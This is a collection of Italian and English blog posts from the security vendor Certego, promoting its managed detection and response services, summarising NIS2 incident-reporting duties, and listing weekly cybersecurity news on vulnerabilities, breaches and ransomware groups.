Ottimizzazione degli investimenti in sicurezza:

Attraverso i dati di Intelligence, le organizzazioni possono ottimizzare gli investimenti in sicurezza, concentrando le risorse su soluzioni e procedure che offrono la massima protezione contro le minacce.

Riduzione dei costi associati agli incidenti di sicurezza:

Prevenendo gli attacchi e riducendo il tempo di risposta agli incidenti, le organizzazioni possono diminuire notevolmente i costi finanziari e di reputazione associati alle violazioni dei dati.

Grazie all’adozione di un approccio adattivo alla cybersecurity, le organizzazioni possono valutare costantemente il rischio a cui sono esposte e adottare misure di sicurezza adeguate alle nuove minacce e alle mutevoli necessità delle infrastrutture aziendali. Questo modello favorisce una comprensione approfondita dei livelli di sicurezza e promuove un miglioramento continuo basato sui dati, garantendo un elevato livello di sicurezza in un ambiente digitale in costante evoluzione.

2. Upgrade e semplificazione tecnologica

Negli ultimi anni, abbiamo assistito a un costante aumento del numero di dispositivi aziendali connessi alla rete, in parallelo con la crescente complessità dei sistemi informatici. Questa evoluzione ha spinto molte organizzazioni a implementare nel corso del tempo soluzioni di sicurezza specifiche per i diversi ambienti infrastrutturali, come ad esempio quelli on-premise, cloud, sistemi OT e i network.

Oltre alla necessità di rafforzare la sicurezza, la semplificazione dei processi di gestione del rischio informatico è diventata cruciale. La gestione di diverse soluzioni di cybersecurity rappresenta una sfida per gli addetti alla sicurezza delle organizzazioni, che devono analizzare il traffico e correlare i dati provenienti da diverse fonti.

Le soluzioni di cybersecurity più moderne superano questa sfida consentendo alle organizzazioni di unificare il monitoraggio dei vari ambienti infrastrutturali all'interno di un’unica piattaforma e orchestrare anche le attività di analisi e risposta degli incidenti in una sola console, riducendo la complessità derivante dall’utilizzo di molteplici soluzioni di diversi fornitori.

L'utilizzo di una singola soluzione per la gestione end-to-end della sicurezza informatica rappresenta un notevole vantaggio per qualsiasi azienda, consentendo di valutare in maniera più chiara i livelli di sicurezza e di reagire rapidamente agli eventuali attacchi informatici.

Una moderna piattaforma di cybersecurity in grado unificare tutte le operazioni di Monitoring, Detection & Response in un’unica console, presenta numerosi vantaggi rispetto all’adozione di più soluzioni:

Tempi di rilevazione e risposta ridotti:

La capacità di monitorare e analizzare i dati di sicurezza in un'unica piattaforma consente di identificare e rispondere agli incidenti di sicurezza più rapidamente, riducendo il tempo di esposizione alle minacce.

Visione olistica:

Fornisce una visione completa e unificata delle minacce e delle vulnerabilità in tutti gli ambienti infrastrutturali, consentendo una comprensione più profonda e integrata dei rischi di sicurezza.

Analisi avanzata:

L'integrazione dei dati di sicurezza in una piattaforma unificata permette l'uso di tecnologie avanzate di analisi, come l'intelligenza artificiale (AI) e l'apprendimento automatico (ML), per identificare schemi complessi e prevedere potenziali minacce con maggiore precisione.

Scalabilità:

Una soluzione unificata può essere più facilmente scalata per adattarsi alla crescita dell'organizzazione e all'evoluzione del paesaggio delle minacce, senza la necessità di integrare continuamente nuovi strumenti.

Efficienza operativa:

L'utilizzo di un'unica soluzione riduce la complessità operativa e i costi associati alla gestione di più strumenti. Questo si traduce in una maggiore efficienza operativa e in una riduzione degli oneri amministrativi per il personale IT e di sicurezza.

Migliore collaborazione:

Favorisce una migliore collaborazione tra i team di cybersecurity e altre funzioni IT, poiché tutti possono accedere e lavorare con le stesse informazioni e strumenti.

Coerenza dele politiche di sicurezza:

Facilita l'implementazione di politiche e procedure di sicurezza coerenti in tutta l'organizzazione, migliorando la gestione dei rischi e la compliance.

L’adozione di una soluzione unificata per le attività di Monitoraggio, Analisi e Risposta migliora l'efficacia della protezione, semplifica la gestione dei rischi e consente una risposta più rapida agli incidenti, offrendo notevoli vantaggi rispetto all'utilizzo di soluzioni separate.

3. Ottimizzazione delle risorse

L'incremento dei rischi informatici richiede un ampliamento del personale di sicurezza, ma le difficoltà nel formare un team esperto interno e la carenza di risorse qualificate rappresentano sfide significative per i CISO. In questo contesto, l’adozione di un servizio di Managed Detection & Response si rivela una soluzione efficace, offrendo accesso a tecnologie avanzate e a professionisti altamente qualificati nella gestione delle minacce, senza i costi associati alla formazione e al mantenimento di un team interno. Questi vantaggi si traducono in diversi aspetti chiave che delineano il valore aggiunto di un servizio MDR per le aziende:

Esperti dedicati di sicurezza:

I servizi di MDR offrono team specializzati nelle attività di analisi, rilevamento e risposta, eliminando la necessità di investimenti formativi interni.

Risposta rapida alle minacce:

Con una reattività immediata, i servizi di Managed Detection & Response consentono di minimizza i danni potenziali, proteggendo la continuità aziendale.

Copertura Continua:

Monitoraggio e protezione 24/7 assicurano una difesa costante, superando i limiti delle risorse interne.

Riduzione dei Costi:

La scelta dei servizi MDR è economicamente vantaggiosa rispetto alla creazione di un'infrastruttura di sicurezza interna.

Reportistica più efficace:

Forniscono reportistica dettagliata per adattare i servizi di difesa alle nuove necessità.

Focus sul core business:

Consentono ai reparti IT aziendali di avere più tempo da dedicare alle attività più strettamente correlata al business aziendale.

Scalabilità:

I servizi MDR si adattano alle esigenze in evoluzione dell’organizzazione

I servizi di Managed Detection & Response migliorano la sicurezza informatica aziendale attraverso una gestione delle risorse più efficiente, l’accesso a competenze altamente specializzate, tecnologie avanzate e una protezione continua.

4. Compliance alle normative in materia di sicurezza informatica

Nell'epoca dell'interconnessione crescente, il rischio di violazioni dei dati non è più solo una questione economica, ma ha acquisito una rilevanza sociale e politica significativa.

Questa realtà ha spinto l'adozione di normative nel campo della sicurezza informatica, tra cui il DORA, NIS2, il Cyber Resilience Act e il regolamento europeo sulla cybersecurity. Per le aziende, la conformità a tali normative è diventata essenziale non solo per evitare sanzioni, ma anche per rafforzare la fiducia dei clienti e delle autorità.

In questo contesto, le organizzazioni sono chiamate non solo a implementare soluzioni tecnologiche specifiche, ma anche a adottare servizi e tecnologie in grado di gestire l'intero ciclo di vita di un incidente e di fornire una reportistica dettagliata in merito a tali incidenti. In particolare, una piattaforma tecnologica per la gestione delle attività di Detection & Response assume un ruolo cruciale, consentendo alle aziende di conformarsi alle normative vigenti e di sviluppare una strategia di sicurezza ben strutturata, fornendo al contempo un quadro completo per la gestione degli incidenti di sicurezza.

Certego MDR: la soluzione completa per le nuove sfide di Cybersecurity:

I servizi Certego di Managed Detection & Response vengono erogati attraverso la piattaforma proprietaria o PanOptikon che abilita le attività di monitoraggio in tempo reale, analisi e risposta degli incidenti, oltre all’interazione diretta tra il team IT del cliente e il Detection & Response team di Certego.

La piattaforma utilizza un approccio modulare per adattarsi all'infrastruttura dell'organizzazione e scalare in base alle nuove necessità.

Scopri come superare le 4 sfide cruciali della cybersecurity con la piattaforma PanOptikon e i servizi MDR di Certego

Weekly Highlights - January 26th

Thu, 25 Jan 2024 23:00:00 GMT

HPE says hackers had access to emails for 6 months

#Vulnerabilities

Hewlett Packard Enterprise revealed that its cloud email environment was targeted by hackers believed to be sponsored by the Russian government.

Hackers start exploiting critical Atlassian Confluence RCE flaw

#Vulnerabilities

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added an Atlassian Confluence Data Center and Server Template Injection bug, tracked as CVE-2023-22527, to its Known Exploited Vulnerabilities (KEV) catalog.

Over 5.300 GitLab servers exposed to zero-click account takeover attacks

#Vulnerabilities

Internet-exposed GitLab instances are vulnerable to CVE-2023-7028, a zero-click account takeover flaw GitLab warned about earlier this month.

World Economic Forum has unveiled the "Global Cybersecurity Outlook 2024"

#Reports

The report offers an in-depth look at the cybersecurity trends that will shape the future of economies and societies in the coming year.

Italy - CERT-AGID

#Reports

CERT-AGID published the summary of malicious campaigns in Italy during the week of January 13 – 19, 2024.

Weekly Highlights - January 19th

Thu, 18 Jan 2024 23:00:00 GMT

Ivanti Connect Secure zero-days now under mass exploitation

#Vulnerabilities

Two zero-day vulnerabilities affecting Ivanti's Connect Secure VPN and Policy Secure network access control (NAC) appliances are now under mass exploitation.

ENISA and the members of the EU CSIRT network are monitoring the disclosed vulnerability on Ivanti Pulse Secure devices

#Vulnerabilities

All the advisories published for the European CSIRT network members are available on GitHub.

Turkish Cyberspies Targeting Netherlands

#Cyber Espionage

Turkish state-sponsored group Sea Turtle has been targeting multiple organizations in the Netherlands for espionage.

ECSO has announced the upcoming release of the updated white paper regarding the NIS2 implementation

#Regulations

Turkish state-sponsored group Sea Turtle has been targeting multiple organizations in the Netherlands for espionage.

New calls for proposals under the Digital Europe Programme

#European Union

Released initiatives aimed at developing cyber projects within the scope of the European Cybersecurity Competence Centre (ECCC)'s mission.

Weekly Highlights - January 12th

Thu, 11 Jan 2024 23:00:00 GMT

European Union Regulation on cybersecurity

#Regulations

On January 7, the new European Union Regulation on cybersecurity came into effect, introducing provisions aimed at ensuring a higher and shared level of cybersecurity for institutions, legislative bodies, and entities of the Union.

AGID

#Reports

AGID (Agenzia per l’Italia digitale) has published the report on malicious campaigns that targeted Italy in 2023.

NIST

#Artificial Intelligence

NIST highlights the importance of cybersecurity challenges associated with the rapid implementation of Artificial Intelligence systems.

CISA

#Vulnerabilities

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added six security vulnerabilities to the Known Exploited Vulnerabilities (KEV) catalog.

Weekly Highlights - December 22nd

Thu, 21 Dec 2023 23:00:00 GMT

Google fixes 8th Chrome zero-day exploited in attacks this year

#Vulnerabilities

Google has released emergency updates to fix another Chrome zero-day vulnerability exploited in the wild, the eighth patched since the start of the year.

ALPHV/BlackCat

#Threat Actors

The ALPHV/BlackCat ransomware gang has made over $300 million in ransom payments from more than 1,000 victims worldwide as of September 2023, according to the Federal Bureau of Investigation (FBI).

Law enforcement seizes ALPHV/Blackcat sites, offers decryptor to victims

#Threat Actors

The US Justice Department announced today a disruption campaign against the Blackcat/ALPHV ransomware group and let victims know that there is a decryptor they can use.

8220 gang exploits old Oracle WebLogic vulnerability to deliver infostealers, cryptominers

#Threat Actors

Active since 2017, the 8220 gang has been known for deploying cryptocurrency miners on Linux and Windows hosts by exploiting known vulnerabilities.

The “2023 CWE Top 10 KEV Weaknesses” list, which lists the top ten CWEs in the Cybersecurity and Infrastructure Security Agency’s (CISA) “Known Exploited Vulnerabilities (KEV) Catalog,” is now available

#Research

This list, providing additional information that organizations can use in their efforts to mitigate risk, was announced by the Homeland Security Systems Engineering and Development Institute. It is sponsored by the Department of Homeland Security and operated by the non-profit MITRE.

ACN (Agenzia per la Cybersicurezza Nazionale) has published the Guidelines on password storage

#Research

The document, created in collaboration with the Italian Privacy Guarantor, is the first in a series that will help protect the cyberspace.

NIST (National Institute of Standards and Technology) calls for information to support safe, secure and trustworthy development and use of Artificial Intelligence

#Artificial Intelligenge

Weekly Highlights - December 15th

Thu, 14 Dec 2023 23:00:00 GMT

MITRE launches Critical Infrastructure Threat Model Framework

#Research

EMB3D is the new threat model framework for defenders tasked with protecting operational technology (OT) and industrial control systems (ICS).

CISA and ENISA signed a Working Arrangement in the areas of capacity-building, best practices exchange and boosting cybersecurity awareness

#Cybersecurity Cooperations

CISA and ENISA have signed a collaboration agreement on cybersecurity.

Microsoft's Digital Crimes Unit seized multiple domains used by the Vietnam-based cybercrime group Storm-1152

#Threat Actors

Storm-1152 registered over 750 million fraudulent accounts and raked in millions of dollars by selling them online to other cybercriminals.

Cybercrime market OLVX gains popularity among hackers

#Threat Actors

A new cybercrime marketplace, OLVX, has emerged and is quickly gaining new customers looking to purchase tools to conduct online fraud and cyberattacks. 

White House wants to set minimum cyber standards for hospitals and healthcare

#Vulnerabilities

The sector has faced a wave of ransomware linked to the critical CitrixBleed vulnerability, which has led to major attacks from LockBit and other threat groups.

Cybercrime: l’altra faccia della digitalizzazione

Wed, 13 Dec 2023 23:00:00 GMT

Il 2023 ha fatto registrare un rapido aumento dei crimini informatici. All’accelerazione del processo di digitalizzazione che stiamo vivendo corrisponde l’aumento dei rischi informatici a cui siamo esposti. Una maggiore vulnerabilità che spesso non è accompagnata da una maggiore consapevolezza di essere bersagli per il cybercrime. La sicurezza delle aziende è costantemente messa alla prova da nuove tipologie di minacce. È fondamentale avere a disposizione dati tangibili sull’andamento della sicurezza informatica per fare cultura e progettare nuove strategie di difesa.

Per questo Certego e AUSED – Associazione tra Utenti di Sistemi e Tecnologie dell’Informazione – hanno unito le forze e dato vita al report periodico State of cybersecurity. 180 aziende italiane per un totale di 1.200.000 asset monitorati all’interno della piattaforma MDR Certego PanOptikon®, questi i numeri del campione analizzato dalla ricerca condotta da Certego per conto di AUSED.

L’obiettivo dell’ultimo numero del report è confrontare i volumi degli attacchi informatici del terzo trimestre del 2023 con lo stesso periodo dell’anno precedente e analizzare l’evoluzione dello stato di sicurezza delle aziende italiane.

Come cresce il fenomeno

Nel trimestre in esame gli eventi di cybersecurity monitorati da Certego sono aumentati in modo consistente. Gli allarmi – eventi di cybersecurity che hanno passato le prime linee di difesa preventive e che in seguito all’applicazione automatica di regole di Threat Intelligence hanno generato un allarme all’interno della piattaforma MDR Certego PanOptikon® – sono aumentati del 13%. Mentre i veri e propri incidenti – allarmi che in seguito alle attività di analisi del Detection & Response hanno richiesto attività immediate di Incident Response – sono cresciuti del 17%. Dato ancora più significativo quello legato alla severità, o cioè il livello di pericolosità, di un incidente.

Il terzo trimestre del 2023 registra un aumento di tutti i livelli; in particolare, vi è stata una crescita percentuale più elevata dei tentativi di attacco con severità 3, 4 e 5, quelli potenzialmente più pericolosi per le aziende. Questo conferma come gli attacchi stiano sempre più puntando verso asset strategici, i criminali informatici studiano sempre di più le aziende prima di attaccarle.

Con riferimenti ai settori merceologici, rispetto all’anno precedente, gli eventi che hanno scatenato problemi di sicurezza informatica sono aumentati in tutti i comparti monitorati. Servizi, Finanza e Manifattura hanno registrato un aumento dei tentativi di attacco superiore al 50%.

Chi è sotto attacco?

Oltre alle grandi aziende e alle impresse ad alto coefficiente tecnologico, oggi gli attacchi si dirigono anche verso le società piccole e non strettamente connesse, come aree di business, al digital che spesso sono più vulnerabili ed esposte.

Rispetto allo stesso periodo del 2022, si registra un aumento del 31% dei tentativi di attacco verso le PMI rispetto ad un +13% per le grandi aziende. Il processo di digitalizzazione, in corso anche nelle piccole e medie imprese, porta a un aumento del numero di dispositivi connessi alla rete, ampliando così i potenziali punti di accesso per i criminali informatici. Questa maggiore esposizione spesso non si accompagna ad una crescita proporzionale della consapevolezza del rischio.

Come sottolineato nell’indagine svolta da Ipsos per Certego e 24ORE Business School, pubblicata negli scorsi mesi (Indagine IPSOS per Certego), vi è una bassa percezione del rischio informatico (le aziende si sentono sicure). Questo può comportare una sottovalutazione del rischio e, di conseguenza, una carenza nelle procedure di sicurezza predisposte.

La tendenza di crescita degli attacchi, inoltre, coinvolge sia le aziende private che quelle pubbliche.

Nessun confine

Il rischio informatico non ha confini, limiti nazionali o continentali. Ci troviamo di fronte ad un fenomeno globale che connette la nostra economia e le nostre imprese con il resto del mondo.

Nel terzo trimestre del 2023, sulla base dei dati analizzati da Certego, la Cina si posiziona al primo posto per la provenienza degli attacchi, seguita dagli Stati Uniti.

Analizzare la provenienza degli attacchi è fondamentale per poter sviluppate azioni mirate di risposta. Attraverso attività di Cyber Threat Intelligence, che includono la raccolta, l’elaborazione e l’analisi di grandi quantità di dati sulle minacce e le tendenze della sicurezza informatica, è possibile: rafforzare la sicurezza aziendale tramite la comprensione dell’avversario; anticipare in modo proattivo gli attaccanti; rispondere più velocemente in caso di incidente e prendere decisioni strategiche per il futuro, investendo il budget in modo profittevole. Nell’attuale paradigma della sicurezza informatica, la Cyber Threat Intelligence rappresenta un vantaggio competitivo per tutte le imprese. Le PMI possono trarre vantaggio dai dati di intelligence per raggiungere un livello di protezione molto più avanzato. Per le aziende più grandi, che hanno già al loro interno un team di sicurezza, i dati di intelligence rappresentano un vantaggio tangibile per ridurre i costi attraverso l’ottimizzazione dei processi di cybersecurity.

Allineamento alla Direttiva NIS2

Pier Giorgio Bergonzi, Product Marketing — Mon, 11 Dec 2023 23:00:00 GMT

Summary

Direttiva NIS2 aggiornata
NIS2, si applica a più settori industriali
I cambiamenti chiave, dalla NIS alla NIS2
Gestione e reportistica degli incidenti
Gestione e reportistica degli incidenti con i servizi MDR Certego
Whitepaper

1. Direttiva NIS2 aggiornata

Nel gennaio 2023, gli Stati membri dell'UE hanno formalmente emanato una revisione della Direttiva sulla sicurezza delle reti e dei sistemi informatici (Network and Information Systems - NIS) 2016.

La direttiva NIS2 aggiornata è stata progettata per ampliare il campo di applicazione dell'originale. Concepita in risposta a diversi cyber attacchi ampiamente pubblicizzati e dannosi, la Direttiva NIS2 rafforza i requisiti di sicurezza, razionalizza gli obblighi di reportistica e introduce misure di supervisione più rigide e requisiti di applicazione più rigorosi.

La nuova Direttiva intende rafforzare le difese delle entità critiche contro le vulnerabilità della supply chain, gli attacchi ransomware e altre minacce informatiche.

Tutti i 27 Stati membri dell’EU sono tenuti a ratificare la Direttiva NIS2 entro ottobre 2024.

2. NIS2, si applica a più settori industriali

La direttiva NIS2 verrà applicata a un insieme più ampio e approfondito di entità critiche rispetto a quanto attualmente coperto dalla Direttiva NIS. Comprende nuovi settori e definisce due diversi tipi di entità critiche: essenziali e importanti. Gli obblighi sono gli stessi per entrambe, ma quelle essenziali sono soggette a misure di applicazione e sanzioni più rigorose.

La Direttiva NIS2 si applica a qualsiasi entità che fornisca servizi critici all’interno di un paese membro UE, indipendentemente da dove si trova tale entità.

Organizzazioni essenziali:
- Sanità
- Energia
- Trasporti
- Finanza
- Approvvigionamento idrico
- Bancario
- ICT
- Acque reflue
- Salute (farmaci, R&S, dispositivi medici critici)
- Spaziale
- Amministrazione pubblica
Organizzazioni importanti
- Servizi postali e corrieri espresso
- Chimico
- Alimentare
- Manifatturiero
- Digital Provider (piattaforme di social networking, motori di ricerca, marketplace online)
- Servizi postali e corrieri espresso
- Gestione dei rifiuti
- Organizzazioni di ricerca

3. I cambiamenti chiave, dalla NIS alla NIS2

L'articolo 21 del NIS2 obbliga gli Stati membri a garantire che le entità essenziali e importanti gestiscano il rischio implementando sistemi, policy e best practice efficaci che coprano un'ampia gamma di misure e discipline di cybersecurity, tra cui:

Analisi dei rischi e sicurezza dei sistemi informatici;
Gestione e reportistica degli incidenti;
Continuità operativa, come la gestione dei backup e il ripristino di emergenza;
Gestione delle crisi;
Sicurezza della supply chain;
Sicurezza nell'acquisizione, sviluppo e manutenzione dei sistemi;
Pratiche di base per la cyber-igiene (vedere la definizione riportata di seguito) e formazione sulla cybersecurity;
Tecnologie di crittografia e cifratura;
Sicurezza delle risorse umane, policy di controllo degli accessi e gestione delle risorse;
Accesso Zero Trust (autenticazione multifattore, autenticazione continua).

4. Gestione e reportistica degli incidenti

La direttiva NIS2 impone ad ogni entità critica, obblighi di notifica per gli incidenti che hanno un "impatto significativo" sulla fornitura dei loro servizi. Queste notifiche devono essere effettuate presso l'autorità competente o il CSIRT (Computer Security Incident Response Team) pertinente.

Obblighi di notifica multi-livello:

Early Warning

Entro 24 ore dal momento in cui si viene a conoscenza dell'incidente. Sarà necessario indicare se si sospetta che l'incidente significativo sia causato da atti illeciti o dolosi, o possa avere un impatto transfrontaliero.

Official Incident Notification

Entro 72 ore dall'inizio dell'incidente Aggiornamento delle informazioni precedentemente fornite, indicando una valutazione iniziale dell'incidente significativo, compresi la gravità e l'impatto, nonché, se disponibili, gli indicatori di compromissione.

Intermediate Status Report

Su richiesta del CSIRT o dell'autorità competente pertinente.

Final Report

Entro un mese dall'inizio dell'incidente. Se l'incidente è in corso al momento della relazione finale, verrà presentata una relazione di avanzamento e la relazione finale sarà fornita un mese dopo. Redazione di una relazione finale che comprende:

descrizione dettagliata dell'incidente, compresi la gravità e l'impatto;
il tipo di minaccia o la causa principale che probabilmente ha scatenato l'incidente;
le misure di mitigazione applicate e in corso;
nel caso, l'impatto transfrontaliero dell'incidente.

5. Gestione e reportistica degli incidenti con i servizi MDR Certego

I servizi gestiti di sicurezza informatica erogati da Certego si basano su un modello adattivo che, partendo dalle attività di Prevenzione, è in grado di gestire ogni fase di un incidente informatico.

PanOptikon® Cybersecurity Platform

La piattaforma di cybersecurity PanOptikon® è la soluzione SaaS che consente al Team di Detection & Response di semplificare i processi di rilevamento e risposta agli attacchi e migliorare l’interazione tra Certego e il cliente.

Detection & Response Team

Il Team di Detection and Response include analisti, incident responders e investigatori forensi per identificare, analizzare e rispondere alle minacce informatiche. Fornisce un supporto tempestivo con raccomandazioni per il contenimento, l'eradicazione, il ripristino e la resilienza 24/7/365.

Threat Intelligence

6. Whitepaper

Scopri come i servizi gestiti di Incident Response di Certego ti permettono, di essere conforme agli obblighi di Gestione e reportistica degli incidenti introdotti dal NIS2.

Il Whitepaper mostra un esempio pratico di come i servizi gestiti di Incident Response di Certego ti permettono di essere conforme agli obblighi di notifica multi-livello richiesti dalla normativa NIS2, in ogni fase di un attacco.

Allineamento alla direttiva NIS2

Mon, 11 Dec 2023 23:00:00 GMT

Nel gennaio 2023, gli Stati membri dell'UE hanno formalmente emanato una revisione della Direttiva sulla sicurezza delle reti e dei sistemi informatici (Network and Information Systems - NIS) 2016.

La direttiva NIS2 aggiornata è stata progettata per ampliare il campo di applicazione dell'originale. Concepita in risposta a diversi cyber attacchi ampiamente pubblicizzati e dannosi, la Direttiva NIS2 rafforza i requisiti di sicurezza, razionalizza gli obblighi di reportistica e introduce misure di supervisione più rigide e requisiti di applicazione più rigorosi.

In particolare, la direttiva NIS2 impone ad ogni entità critica, obblighi di notifica per gli incidenti che hanno un "impatto significativo" sulla fornitura dei loro servizi. Queste notifiche devono essere effettuate presso l'autorità competente o il CSIRT (Computer Security Incident Response Team) pertinente.

In questo Whitepaper mostriamo un esempio pratico di come i servizi gestiti di Incident Response di Certego ti permettono di essere conforme agli obblighi di notifica multi-livello richiesti dalla normativa NIS2, in ogni fase di un attacco.

Compila il form per ricevere il Whitepaper e scoprire come prepararsi agli aggiornamenti sulla conformità previsti dal NIS2.

Weekly Highlights - December 8th

Thu, 07 Dec 2023 23:00:00 GMT

Okta reveals October security breach was much more damaging

#Breaches and Incidents

Initially estimated to affect less than 1% of users, the breach now encompasses all Okta customer support users, compromising their full names and email addresses.

CVE-2023-44302

#Vulnerabilities

Dell DM5500 5.14.0.0 and prior contain an improper authentication vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability to gain access of resources or functionality that could possibly lead to execute arbitrary code.

CVE-2023-40056

#Vulnerabilities

SQL Injection Remote Code Vulnerability was found in the SolarWinds Platform. This vulnerability can be exploited with a low privileged account.

Data breach at 23andMe, the genetic testing company, affects 6.9 million profiles

#Breaches and Incidents

Reused passwords on 23andMe allowed hackers to access personal data from millions of people, which in some cases included DNA information.

Malek Team, the Iran-linked hacker group, claims to have stolen a trove of 500GB of medical data from Ziv Medical Center

#Cyberwar

Within various Telegram posts, the group has started to publish documents, including alleged data from the Israeli Defense Forces (IDF).

The European Space Agency explores cybersecurity for space industry

#Space

ESA is developing a Space Cybersecurity Operations Centre (C-SOC) to detect and respond to emerging cyberattacks on space system infrastructures.

PMI e cybersecurity, aumentare la protezione e sentirsi al sicuro con i servizi MDR

Sun, 03 Dec 2023 23:00:00 GMT

Il processo di digitalizzazione in atto, ha portato negli ultimi anni ad un significativo aumento dei dispositivi collegati alla rete nelle PMI. Sebbene ciò abbia contribuito al miglioramento dell'efficienza operativa, la crescente interconnessione digitale e l’aumento degli endpoint espongono le PMI a un rischio informatico sempre più elevato.

I servizi MDR costituiscono un elemento cruciale nell'implementazione di una strategia proattiva in materia di sicurezza informatica, per affrontare le sfide quotidiane a cui anche le PMI sono esposte nel campo della sicurezza informatica, adattandosi con flessibilità alle crescenti e mutevoli esigenze del contesto attuale.

In questo PDF analizziamo i princiali vantaggi dei servizi di Managed Detection and Response per le Piccole e Medio Imprese.

Compila il form per ricevere il report e approfondire i risultati della ricerca.

Weekly Highlights - December 1st

Thu, 30 Nov 2023 23:00:00 GMT

Ransomware gang Black Basta has made over $100 million in two years.

#Threat Actors

Estimates suggest that the Black Basta ransomware group has earned over $100 million in less than two years.

Google has issued a critical security update.

#Vulnerabilities

Google has issued a critical security update to address various vulnerabilities in the Chrome browser. Among the addressed issues is a zero-day vulnerability (CVE-2023-6345) actively exploited in the wild.

Cloud Security Alliance (CSA) released the Cloud Adversarial Vectors, Exploits, and Threats paper.

#Vulnerabilities

The paper focuses on recommendations on advancing adversarial analysis and threat mitigation for the cloud security industry.

ENISA has published "Annual Report Trust Services Security Incidents 2023”.

#Vulnerabilities

The report gives an aggregate overview of the security incident reports submitted by the supervisory bodies during 2022.

PMI: perché la cybersecurity è una priorità

Pier Giorgio Bergonzi, Product Marketing — Tue, 28 Nov 2023 23:00:00 GMT

Nell'attuale scenario digitale, le aziende di ogni dimensione si trovano ad affrontare una crescente varietà di minacce informatiche.

Gli attacchi informatici, come ad esempio violazioni dei dati, malware, DDoS, phishing e spyware, rappresentano una seria minaccia per tutte le tipologie di aziende. Se in passato queste minacce erano principalmente associate alle grandi imprese, l'evoluzione della sicurezza informatica rivela un panorama diverso, con le piccole e medie imprese (PMI) sempre più nel mirino dei criminali informatici.

In passato, si riteneva che gli attacchi informatici costituissero principalmente una minaccia per le grandi imprese, una prospettiva comprensibile data la considerevole quantità di capitale e proprietà intellettuale coinvolta.

Oggi sorge spontanea una domanda: perché i criminali informatici stanno dirigendo la loro attenzione e i loro sforzi sempre più verso le PMI?

La crescente attenzione dei criminali informatici verso le PMI può essere attribuita, in parte, al fatto che le grandi imprese, rafforzando le proprie difese attraverso l'adozione di strategie e tecnologie di sicurezza avanzate, hanno indotto i malintenzionati a cercare anche obiettivi più accessibili e meno protetti. Le PMI, spesso vincolate da risorse limitate in ambito di sicurezza informatica, diventano così prede allettanti per i criminali informatici.

Un altro fattore da considerare è il processo di digitalizzazione che sta coinvolgendo le PMI. In risposta a questa trasformazione, le piccole e medie imprese hanno registrato, negli ultimi anni, un significativo aumento dei dispositivi collegati alla rete. Sebbene ciò abbia contribuito al miglioramento dell'efficienza operativa, ha allo stesso tempo creato ulteriori punti di accesso per i criminali informatici. La crescente interconnessione digitale e l’aumento degli endpoint espongono le PMI a un rischio informatico sempre più elevato.

Consapevolezza dei rischi

Un’altra considerazione cruciale riguarda la percezione delle PMI nei confronti delle minacce informatiche. Secondo il report "Cybersecurity 2023: qual è la consapevolezza delle aziende italiane", commissionato da Certego e condotto da IPSOS a giugno 2023, su un campione di 220 aziende italiane, di cui particolare rilevanza è rivolta alle PMI, il 52% dei decision maker nell'ambito informatico intervistati, afferma che la propria azienda è "poco" o "per niente" esposta ai rischi informatici.

Il report evidenzia inoltre che, in risposta alla domanda "con quale probabilità pensa che la sua azienda si troverà a gestire un attacco informatico nei prossimi mesi?", l'83% degli intervistati dichiara una probabilità "abbastanza bassa".

Questo divario nella percezione è ancora più rilevante se confrontato con il report di ricerca “State of Cybersecurity 2023” svolto da Certego, analizzando un campione di 1.200.000 asset monitorati all’interno della piattaforma di cybersecurity Certego PanOptikon®. L’analisi evidenzia che nel corso dell'ultimo quadrimestre (luglio-settembre 2023), i tentativi di attacco verso le PMI italiane sono aumentati del 31% rispetto all'anno precedente, mentre gli attacchi alle aziende Enterprise sono cresciuti del 13%. Il report condotto da Certego indica inoltre che, ad essere aumentati in maniera più esponenziale sono gli attacchi con livelli di severity più elevata (+33%).

La discrepanza tra la consapevolezza dichiarata dei rischi e la realtà delle minacce monitorate, rappresenta un rischio non trascurabile; le conseguenze delle interruzioni operative o la perdita dei dati coinvolgono in egual misura tutte le aziende, incluse le PMI. Questo rende la sicurezza delle PMI ancora più delicata, poiché spesso, queste realtà, devono affrontare sfide crescenti con risorse e competenze limitate nel campo della sicurezza informatica.

Oggi la sicurezza informatica non è più un lusso, ma una necessità per qualsiasi organizzazione che miri a prosperare nell'era digitale. Ma come affrontare questa sfida?

Approccio proattivo alla cybersecurity e MDR

Le tradizionali tecnologie di difesa preventive, da sole, non sono più sufficienti per contrastare le sofisticate modalità degli attacchi informatici più recenti. Date le tattiche in costante evoluzione adottate dai criminali digitali, è fondamentale adottare un approccio proattivo per garantire la sicurezza dei dati e la continuità operativa aziendale.

I servizi di Managed Detection and Response (MDR) costituiscono un elemento cruciale nell'implementazione di una strategia proattiva in materia di sicurezza informatica. Rappresentano una soluzione preziosa per affrontare le sfide quotidiane a cui anche le PMI sono esposte nel campo della sicurezza informatica, adattandosi con flessibilità alle crescenti e mutevoli esigenze del contesto attuale.

Combinando tecnologie di rilevamento avanzate a un team di analisti altamente specializzati, i più moderni servizi MDR forniscono alle aziende una soluzione di sicurezza pronta all'uso che consente di individuare, analizzare, investigare e rispondere alle minacce in modo efficiente, semplificando le attività di Incident Response e riducendo i tempi di risposta, limitando così l'impatto degli attacchi.

Vantaggi di un moderno servizio di MDR

Monitoraggio continuo 24/7

Gli attacchi informatici possono avvenire in qualsiasi momento, soprattutto quando il team IT è meno disponibile, come di notte, weekend e festività. I servizi MDR offrono copertura 24/7, garantendo tranquillità e sicurezza. Per i team IT aziendali, ciò significa potersi concentrare sulle attività più strettamente correlate al business e… dormire meglio. Per i dirigenti, il monitoraggio 24/7 ad opera di un team esterno esperto e la prontezza in ogni momento in caso di attività rappresenta un’importante rassicurazione di continuità operativa aziendale.

Riduzione dell'impatto sulle operazioni aziendali

Le attività di Monitoring, Detection e Incident Response richiedono tempo e sono imprevedibili. I servizi MDR liberano capacità IT, consentendo ai team aziendali di concentrarsi su sfide strategiche per il business, delegando le attività di cybersecurity al fornitore di servizi MDR.

Colmare le lacune di competenza

La gestione delle minacce richiede competenze specializzate, spesso difficili da trovare in-house. I servizi MDR forniscono l'esperienza necessaria, consentendo alle organizzazioni di ampliare le capacità di sicurezza senza l'onere di aumentare il personale.

Massimizzare gli investimenti in cybersecurity

Costituire e mantenere un team interno per il monitoraggio delle minacce 24/7 è costoso e richiede numerosi membri del personale. I servizi MDR offrono una soluzione efficiente in termini di costi per proteggere l'organizzazione e massimizzare il budget in sicurezza informatica.

